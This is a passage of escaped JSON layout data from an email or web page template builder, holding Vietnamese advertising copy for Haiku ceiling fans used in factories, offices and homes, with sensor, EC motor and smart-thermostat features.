M\\u00c1T\\\"}},{\\\"id\\\":\\\"khH4HCU0qh\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_27\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\\"}},{\\\"id\\\":\\\"GnyONZJkpD\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"17px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_2\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong>L\\u00c0M M\\u00c1T M\\u00d4I TR\\u01af\\u1edcNG C\\u00d4NG NGHI\\u1ec6P<\\/strong>\\\"}},{\\\"id\\\":\\\"UVoTTP0tLw\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_28\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">Trong m\\u00f4i tr\\u01b0\\u1eddng c\\u00f4ng nghi\\u1ec7p, vi\\u1ec7c ki\\u1ec3m so\\u00e1t lu\\u1ed3ng gi\\u00f3 kh\\u00f4ng kh\\u00ed \\u0111\\u1ea3m b\\u1ea3o nhi\\u1ec7t \\u0111\\u1ed9 ch\\u00eanh l\\u1ec7ch t\\u1eeb 3-60C v\\u1edbi kh\\u1ea3 n\\u0103ng ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n h\\u00e0ng n\\u0103m. Ch\\u1ec9 c\\u00f3 qu\\u1ea1t tr\\u1ea7n, qu\\u1ea1t th\\u1ed5i s\\u00e0n c\\u00f4ng nghi\\u1ec7p HVLS s\\u1ebd ph\\u00f9 cho b\\u1ea5t c\\u1ee9 kh\\u00f4ng gian r\\u1ed9ng l\\u1edbn n\\u00e0o v\\u1edbi hi\\u1ec7u su\\u1ea5t l\\u00e0m m\\u00e1t tuy\\u1ec7t v\\u1eddi, ki\\u1ec3m so\\u00e1t kh\\u00f4ng kh\\u00ed th\\u1ed5i s\\u00e0n \\u0111\\u01b0a lu\\u1ed3ng kh\\u00ed \\u0111\\u1ebfn nh\\u1eefng n\\u01a1i c\\u1ea7n thi\\u1ebft.<\\/p>\\\"}},{\\\"id\\\":\\\"D5JSJd9Ztm\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"17px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_4\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong>L\\u00c0M M\\u00c1T M\\u00d4I TR\\u01af\\u1edcNG V\\u0102N PH\\u00d2NG - TT TH\\u01af\\u01a0NG M\\u1ea0I<\\/strong>\\\"}},{\\\"id\\\":\\\"mtNrdaJfzs\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_29\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">Cho d\\u00f9 to\\u00e0 nh\\u00e0 v\\u0103n ph\\u00f2ng l\\u00e0m vi\\u1ec7c cho \\u0111\\u1ebfn trung t\\u00e2m th\\u01b0\\u01a1ng m\\u1ea1i. H\\u1ec7 th\\u1ed1ng qu\\u1ea1t l\\u00e0m m\\u00e1t kh\\u00f4ng gian Commercial s\\u1ebd gi\\u00fap b\\u1ea1n chi ph\\u00ed ti\\u1ec1n \\u0111i\\u1ec7n h\\u00e0ng n\\u0103m l\\u00ean \\u0111\\u1ebfn 30%, gi\\u1ea3m t\\u1ea3i cho h\\u1ec7 th\\u1ed1ng \\u0111i\\u1ec1u ho\\u00e0 nhi\\u1ec7t \\u0111\\u1ed9 \\u1edf m\\u1ee9c th\\u1ea5p nh\\u1ea5t. Kh\\u00e1ch h\\u00e0ng v\\u00e0 nh\\u00e2n vi\\u00ean c\\u1ee7a b\\u1ea1n s\\u1ebd c\\u1ea3m th\\u1ea5y tho\\u1ea3i m\\u00e1i nhi\\u1ec7t v\\u00e0 c\\u00f4ng vi\\u1ec7c s\\u1ebd hi\\u1ec7u qu\\u1ea3 h\\u01a1n<\\/p>\\\"}},{\\\"id\\\":\\\"OJhlDIv95-\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"17px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_5\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong>L\\u00c0M M\\u00c1T M\\u00d4I TR\\u01af\\u1edcNG NH\\u00c0 \\u1ede - C\\u0102N H\\u1ed8 CHUNG C\\u01af<\\/strong>\\\"}},{\\\"id\\\":\\\"n87OHQl-xs\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_30\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">V\\u1edbi kh\\u00f4ng gian Nh\\u00e0 \\u1ede n\\u01a1i c\\u00f3 con ng\\u01b0\\u1eddi sinh ho\\u1ea1t h\\u00e0ng n\\u00e0y. Qu\\u1ea1t tr\\u1ea7n nh\\u00e0 \\u1edf d\\u00e2n d\\u1ee5ng s\\u1ebd gi\\u00fap tho\\u1ea3i m\\u00e1i kh\\u00f4ng gian th\\u00f4ng tho\\u00e1ng c\\u1ea3 ng\\u00e0y. Th\\u00eam m\\u1ed9t c\\u1ea3m bi\\u1ebfn chuy\\u1ec3n \\u0111\\u1ed9ng t\\u00edch h\\u1ee3p s\\u1ebd b\\u1eadt\\/t\\u1eaft qu\\u1ea1t b\\u00e1n t\\u1ef1 \\u0111\\u1ed9ng, trong khi c\\u00e1c c\\u1ea3m bi\\u1ebfn m\\u00f4i tr\\u01b0\\u1eddng li\\u00ean t\\u1ee5c theo d\\u00f5i t\\u00ecnh tr\\u1ea1ng ph\\u00f2ng c\\u1ee7a b\\u1ea1n. Ch\\u1ec9 c\\u1ea7n \\u0111\\u1eb7t t\\u00f9y ch\\u1ecdn \\u0111\\u1ec3 t\\u1ef1 \\u0111\\u1ed9ng qu\\u1ea3n l\\u00fd lu\\u1ed3ng kh\\u00f4ng kh\\u00ed v\\u00e0 \\u00e1nh s\\u00e1ng LED c\\u1ea7n thi\\u1ebft \\u0111\\u1ec3 gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i b\\u1ea5t c\\u1ee9 l\\u00fac n\\u00e0o.<\\/p>\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_12\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"n2Rt0hOclz\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"WFmH-Wf1GI\\\",\\\"contents\\\":[{\\\"id\\\":\\\"hYIdln7nfa\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596365970938-7G9GXVu.jpg\\\",\\\"width\\\":650,\\\"height\\\":44,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_10\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"jSRLw3ca9U\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#f4f4f4\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_11\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f4f4f4\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"8UTkIYmcBT\\\",\\\"cells\\\":[1,1,1],\\\"columns\\\":[{\\\"id\\\":\\\"RpVX_niF28\\\",\\\"contents\\\":[{\\\"id\\\":\\\"gPBUcCFrJJ\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366368130-9kP2jpS.png\\\",\\\"width\\\":225,\\\"height\\\":225,\\\"maxWidth\\\":\\\"35%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_7\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"4MHo-ShRhP\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_12\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%;\\\\\\\"><strong>Gi\\u00e1m S\\u00e1t B\\u1eb1ng C\\u00f4ng Ngh\\u1ec7 Th\\u00f4ng Minh<\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"kyTBdsZF_O\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 22px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_13\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%;\\\\\\\">B\\u1ea1n qu\\u00ean t\\u1eaft qu\\u1ea1t ho\\u1eb7c \\u0111\\u00e8n. C\\u00f4ng ngh\\u1ec7 SenseME\\u2122 s\\u1eed d\\u1ee5ng c\\u1ea3m bi\\u1ebfn h\\u1ed3ng ngo\\u1ea1i th\\u1ee5 \\u0111\\u1ed9ng s\\u1ebd t\\u1ef1 \\u0111\\u1ed9ng b\\u1eadt\\/t\\u1eaft qu\\u1ea1t, \\u0111\\u00e8n khi b\\u1ea1n r\\u1eddi kh\\u1ecfi ph\\u00f2ng.<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"p4RiMp7cwe\\\",\\\"contents\\\":[{\\\"id\\\":\\\"zOj4Xd1cbd\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366402742-jV0TkYE.png\\\",\\\"width\\\":536,\\\"height\\\":536,\\\"maxWidth\\\":\\\"35%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_8\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"JKp-uk_1ew\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_14\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%;\\\\\\\"><strong>\\u0110\\u1ed9ng C\\u01a1 EC Si\\u00eau Ti\\u1ebft Ki\\u1ec7m \\u0110i\\u1ec7n<\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"58BbvH-LPq\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 22px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_15\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%;\\\\\\\">Thi\\u1ebft k\\u1ebf \\u0111\\u1ed9ng c\\u01a1 EC Haiku\\u00ae mang t\\u00ednh \\u0111\\u1ed9t ph\\u00e1 c\\u00f4ng ngh\\u1ec7, kh\\u1ea3 n\\u0103ng ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n hi\\u1ec7u qu\\u1ea3 g\\u1ea5p 4 l\\u1ea7n theo ti\\u00eau chu\\u1ea9n ENERGY START\\u00ae<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"1APzGPG5g5\\\",\\\"contents\\\":[{\\\"id\\\":\\\"bkVasKmXfw\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366425358-2AnQ9PF.png\\\",\\\"width\\\":606,\\\"height\\\":606,\\\"maxWidth\\\":\\\"35%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_9\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"xJ8-pi5ho1\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_16\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%;\\\\\\\"><strong>K\\u1ebft N\\u1ed1i Thi\\u1ebft B\\u1ecb C\\u1ea3m Nhi\\u1ec7t Th\\u00f4ng Minh<\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"OqO7YI2s5y\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 22px 22px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"190%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_17\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 190%;\\\\\\\">Haiku gh\\u00e9p k\\u1ebft n\\u1ed1i v\\u1edbi b\\u1ed9 \\u0111i\\u1ec1u nhi\\u1ec7t Nest Learning\\u2122, Ecobee gi\\u00fap ti\\u1ebft ki\\u1ec7m t\\u1edbi 30% chi ph\\u00ed \\u0111i\\u1ec7n h\\u00e0ng n\\u0103m cho h\\u1ec7 \\u0111i\\u1ec1u h\\u00f2a.<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_10\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f4f4f4\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"_Pc